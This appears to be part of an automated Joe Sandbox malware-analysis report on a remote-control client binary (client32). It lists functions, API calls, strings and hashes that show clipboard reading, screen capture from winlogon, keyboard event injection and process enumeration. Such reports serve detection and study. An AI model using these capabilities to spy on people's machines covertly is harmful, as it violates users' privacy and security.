__waccess_s.LIBCMT ref: 111681AE

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __waccess_s
String ID:
API String ID: 4272103461-0
Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
Instruction ID: ab19ac5a5597399f8d1ca71f455f516602a279338b20f7293c175e29f7786032
Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
Instruction Fuzzy Hash: 00C09BB705410D7F5F155DE5EC00C557F5DD6806747149115FD1C89490DD73E961D540

Function 11164EAD Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE

Download Yara Rule

APIs

__fsopen.LIBCMT ref: 11164EBA

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction ID: eecee5f277637f0c818c851ebfea4a610619873cfad902e7c0818376e8e04ccc
Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction Fuzzy Hash: 0CC09B7644010C77CF111946DC01E4D7F1E97D0664F444010FB1C19560A573E971D585

Function 00651000 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

_NSMClient32@8.PCICL32(?,?,?,006510A8,00000000), ref: 0065100B

Memory Dump Source

Source File: 00000003.00000002.3698267949.0000000000651000.00000020.00000001.01000000.00000007.sdmp, Offset: 00650000, based on PE: true

Associated: 00000003.00000002.3697347028.0000000000650000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3698855636.0000000000652000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_650000_client32.jbxd

Yara matches

Similarity

API ID: Client32@8
String ID:
API String ID: 433899448-0
Opcode ID: bcf7271d315083a8dc9b5948f88720d35dfe72292b861e80aa23c6e2ae061862
Instruction ID: 8d0f32eeee48cd57b263f04485e8d223c2704d65efe0a1307b47eedf3e766425
Opcode Fuzzy Hash: bcf7271d315083a8dc9b5948f88720d35dfe72292b861e80aa23c6e2ae061862
Instruction Fuzzy Hash: E3B092B611034D9B8714EE98E941D7B339DAA48610F00090DBD01473829A61FC60D676

Function 6CEF1E1C Relevance: 1.3, APIs: 1, Instructions: 32sleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CEF09A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6CEF1E32,00000001,?,00000000,00000000,00000000,?,6CF175BC,00000001,00000214), ref: 6CEF09E8

Sleep.KERNEL32(00000000), ref: 6CF1F1D1

Memory Dump Source

Source File: 00000003.00000002.3710952050.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000003.00000002.3710934142.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000003.00000002.3711022108.000000006CF94000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000003.00000002.3711041416.000000006CF96000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000003.00000002.3711061539.000000006CF99000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cee0000_client32.jbxd

Similarity

API ID: AllocateHeapSleep
String ID:
API String ID: 4201116106-0
Opcode ID: a9c33f01c8c41a899d63087910814a5e1a07d7d8ebaae1a6aa61e6a847308c5e
Instruction ID: 52c375a2762af263cad85552ad0630220c8acd2e627c96cd05a4dad96ea44a37
Opcode Fuzzy Hash: a9c33f01c8c41a899d63087910814a5e1a07d7d8ebaae1a6aa61e6a847308c5e
Instruction Fuzzy Hash: 72F0A735A401185BCB604AA5D80078A3FBAABC3378F310322F938C2AC0D631C9478692

Non-executed Functions

Function 11147160 Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 220libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(netapi32.dll,?,?), ref: 11147195
GetProcAddress.KERNEL32(00000000,NetWkstaUserGetInfo), ref: 111471C6
GetProcAddress.KERNEL32(00000000,NetUserGetInfo), ref: 111471D4
GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 111471E2
GetUserNameW.ADVAPI32(?,?), ref: 11147233
GetTickCount.KERNEL32 ref: 111472A0
GetTickCount.KERNEL32 ref: 111472C3

Strings

NetApiBufferFree, xrefs: 111471D6
d, xrefs: 11147229
NetUserGetInfo(%ls\%ls) took %d ms and ret x%x, xrefs: 111472E1
netapi32.dll, xrefs: 1114717E
NetUserGetInfo, xrefs: 111471C8
AccessDenied, xrefs: 1114730D
UserNotFound, xrefs: 111473CE
InvalidComputer, xrefs: 11147414
<not Available>, xrefs: 11147452
NetWkstaUserGetInfo, xrefs: 111471C0

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$CountTick$LibraryLoadNameUser
String ID: <not Available>$AccessDenied$InvalidComputer$NetApiBufferFree$NetUserGetInfo$NetUserGetInfo(%ls\%ls) took %d ms and ret x%x$NetWkstaUserGetInfo$UserNotFound$d$netapi32.dll
API String ID: 132346978-2450594007
Opcode ID: d766d68a65dbef05b4443dd6d9e807eb58abfdc436fa79d712fe2cbede22872e
Instruction ID: 7595ca438a49fe2cfed1e9b9138c1f844f941fc746b3e2b3d1353ee5cc6e5023
Opcode Fuzzy Hash: d766d68a65dbef05b4443dd6d9e807eb58abfdc436fa79d712fe2cbede22872e
Instruction Fuzzy Hash: 3F917A75A012289FDB28CF64C894ADAFBB4EF49318F5581E9E94D97301DB309E80CF91

Function 11033320 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87clipboardCOMMON

Download Yara Rule

APIs

IsClipboardFormatAvailable.USER32(?), ref: 11033361
GetClipboardData.USER32(?), ref: 1103337D
GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110333FC
GetLastError.KERNEL32 ref: 11033406
GlobalUnlock.KERNEL32(00000000), ref: 11033426

Strings

..\ctl32\clipbrd.cpp, xrefs: 1103334E
pData && pSize, xrefs: 11033353

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
String ID: ..\ctl32\clipbrd.cpp$pData && pSize
API String ID: 1861668072-1296821031
Opcode ID: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
Instruction ID: bd08247f7f5b97daa22515b1f99226a4dce8a406111026209efe1a9e37a97f87
Opcode Fuzzy Hash: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
Instruction Fuzzy Hash: 8121D336E1415D9FC701DFE998C1AAEF3B8EF8961AB0040A9E815DF300EF71A900CB90

Function 11113380 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 11113387
GetTickCount.KERNEL32 ref: 111133A1

Strings

..\ctl32\Remote.cpp, xrefs: 111133D4
nc->cmd.mouse.nevents < NC_MAXEVENTS, xrefs: 111133D9

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountIconicTick
String ID: ..\ctl32\Remote.cpp$nc->cmd.mouse.nevents < NC_MAXEVENTS
API String ID: 1307367305-2838568823
Opcode ID: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
Instruction ID: cb75b6c9c213d9e442ee644175f48350251445db3f236d69570c6cf200ac5b3b
Opcode Fuzzy Hash: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
Instruction Fuzzy Hash: 11018135AA8B528AC725CFB0C9456DAFBE4AF04359F00443DE49F86658FB24B082C70A

Function 110C1020 Relevance: 6.1, APIs: 4, Instructions: 93windowthreadCOMMON

Download Yara Rule

APIs

IsIconic.USER32(000000FF), ref: 110C10AD
ShowWindow.USER32(000000FF,00000009,?,1105E793,00000001,00000001,?,00000000), ref: 110C10BD
BringWindowToTop.USER32(000000FF), ref: 110C10C7
GetCurrentThreadId.KERNEL32 ref: 110C10E8

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$BringCurrentIconicShowThread
String ID:
API String ID: 4184413098-0
Opcode ID: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
Instruction ID: 84533db14937db9444e2f7c69536c5845b28cc0232cb9748846df38ed0837754
Opcode Fuzzy Hash: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
Instruction Fuzzy Hash: 1731CD3AA00315DBDB14DE68D48079ABBA8AF48754F1540BAFC169F246CBB5E845CFE0

Function 11113190 Relevance: 3.1, APIs: 2, Instructions: 54keyboardCOMMON

Download Yara Rule

APIs

DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 111131E2
keybd_event.USER32(00000091,00000046,00000000,00000000), ref: 11113215

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ControlDevicekeybd_event
String ID:
API String ID: 1421710848-0
Opcode ID: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
Instruction ID: d69eaa5760cfcdb7a6e8037c3782fd2f7db196db4b5aaba7e7bab0ff0a721f20
Opcode Fuzzy Hash: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
Instruction Fuzzy Hash: E4012432F55A1539F30489B99E45FE7FA2CAB40721F014278EE59AB2C8DAA09904C6A0

Function 110B3100 Relevance: 52.7, APIs: 23, Strings: 7, Instructions: 178filewindowCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(00100000,00000000,Client32DIBQuit), ref: 110B3130
OpenEventA.KERNEL32(00100000,00000000,Client32DIBBlit), ref: 110B3141
OpenEventA.KERNEL32(00000002,00000000,Client32DIBDone), ref: 110B314F
WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FA), ref: 110B3183
OpenFileMappingA.KERNEL32(000F001F,00000000,Client32DIB), ref: 110B31A6
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 110B31C2
GetDC.USER32(00000000), ref: 110B31E8
CreateCompatibleDC.GDI32(00000000), ref: 110B31FC
CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 110B321F
SelectObject.GDI32(00000000,00000000), ref: 110B3236
GetTickCount.KERNEL32 ref: 110B323F
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110B3276
GetTickCount.KERNEL32 ref: 110B327F
GetLastError.KERNEL32(00000000), ref: 110B328E
GdiFlush.GDI32 ref: 110B32A2
SelectObject.GDI32(00000000,?), ref: 110B32AD
DeleteObject.GDI32(00000000), ref: 110B32B4
SetEvent.KERNEL32(?), ref: 110B32BE
DeleteDC.GDI32(00000000), ref: 110B32C8
ReleaseDC.USER32(00000000,00000000), ref: 110B32D4
UnmapViewOfFile.KERNEL32(00000000), ref: 110B32DE
CloseHandle.KERNEL32(00000000), ref: 110B32E5
CloseHandle.KERNEL32(00000000), ref: 110B3309

Strings

Client32DIB, xrefs: 110B319A
Client32DIBDone, xrefs: 110B3143
ScrapeApp, xrefs: 110B3111
ERROR %d blitting from winlogon, took %d ms, xrefs: 110B3295
@L(t, xrefs: 110B31FC
Client32DIBBlit, xrefs: 110B3132
Client32DIBQuit, xrefs: 110B3124

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EventOpen$FileObject$CloseCountCreateDeleteHandleSelectTickView$CompatibleErrorFlushLastMappingMultipleObjectsReleaseSectionUnmapWait
String ID: @L(t$Client32DIB$Client32DIBBlit$Client32DIBDone$Client32DIBQuit$ERROR %d blitting from winlogon, took %d ms$ScrapeApp
API String ID: 2071925733-2690483780
Opcode ID: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
Instruction ID: 4116a02b123aa608432531ba698621a05075ff29bb652617cbc71955754d1d1a
Opcode Fuzzy Hash: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
Instruction Fuzzy Hash: A9518679E40229ABDB14CFE4CD89F9EBBB4FB48704F104064F921AB644D774A900CB65

Function 11107050 Relevance: 40.6, APIs: 16, Strings: 7, Instructions: 304libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll,0BAD89F8,00000002,11030250,?,00000000,1118A896,000000FF,?,1110809F,00000000,?,11030250,00000000,00000000), ref: 1110708D

Part of subcall function 11138260: GetVersion.KERNEL32(00000000,771B0BD0,00000000), ref: 11138283
Part of subcall function 11138260: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 111382A4
Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 111382B4
Part of subcall function 11138260: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111382D1
Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111382DD
Part of subcall function 11138260: _memset.LIBCMT ref: 111382F7

FreeLibrary.KERNEL32(00000000,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 111070DF
LoadLibraryA.KERNEL32(Kernel32.dll,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 11107116
GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 111071A0
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 111071F1
GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 1110726A
SetLastError.KERNEL32(00000078,?,1110809F), ref: 1110728C
SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072A3
SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072B0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1110809F), ref: 111072D0

Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336

CloseHandle.KERNEL32(00000000,00000000,?,00000104,?,1110809F), ref: 11107446

Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E

OpenProcessToken.ADVAPI32(00000000,00000008,?,?,00000000,?,00000104,?,1110809F), ref: 11107360
GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,00000000,?,00000104,?,1110809F), ref: 1110738F
CloseHandle.KERNEL32(?,?,00000000,?,00000104,?,1110809F), ref: 1110743F
FreeLibrary.KERNEL32(?,?,?,?,?,1110809F), ref: 111074CC
FreeLibrary.KERNEL32(00000000,?,?,?,?,1110809F), ref: 111074D3

Strings

psapi.dll, xrefs: 11107088
WTSGetActiveConsoleSessionId, xrefs: 11107184
winlogon.exe, xrefs: 111073D4
ProcessIdToSessionId, xrefs: 11107264
dwm.exe, xrefs: 111073BB
EnumProcesses, xrefs: 111071DF
Kernel32.dll, xrefs: 11107111

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$Handle$ErrorFreeLastProcess$CloseLoadModuleOpenToken$FileImageInformationNameVersion_memset_strrchr
String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$WTSGetActiveConsoleSessionId$dwm.exe$psapi.dll$winlogon.exe
API String ID: 348974188-2591373181
Opcode ID: 044dce669899cd37b7012f5320303afde3b4de6bbd5268eb7c3f06993fea3566
Instruction ID: c6fb8941b728de1d874c8cf5bae9c94d2d097e9c1a5b8d4b24900e8511d45065
Opcode Fuzzy Hash: 044dce669899cd37b7012f5320303afde3b4de6bbd5268eb7c3f06993fea3566
Instruction Fuzzy Hash: A2C17DB1D0066A9FDB22DF658D846ADFAB8BB09314F4141FAE65CE7280D7309B84CF51

Function 11047010 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 214COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 1104702F
wsprintfA.USER32 ref: 110470AE

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

wsprintfA.USER32 ref: 110470E9
GetModuleFileNameA.KERNEL32(00000000,00000014,00000080), ref: 11047203
_strrchr.LIBCMT ref: 1104720C
GetWindowsDirectoryA.KERNEL32(00000016,00000080), ref: 11047235
_free.LIBCMT ref: 11047251

Strings

%s %s, xrefs: 110470BA, 110470E0
V12.00, xrefs: 110470D2
NSS, xrefs: 1104708E
V12.10, xrefs: 110470D9, 110470DE
V1.10, xrefs: 1104709C
CLTCONN.CPP, xrefs: 11047042
NSA %s, xrefs: 110470A8
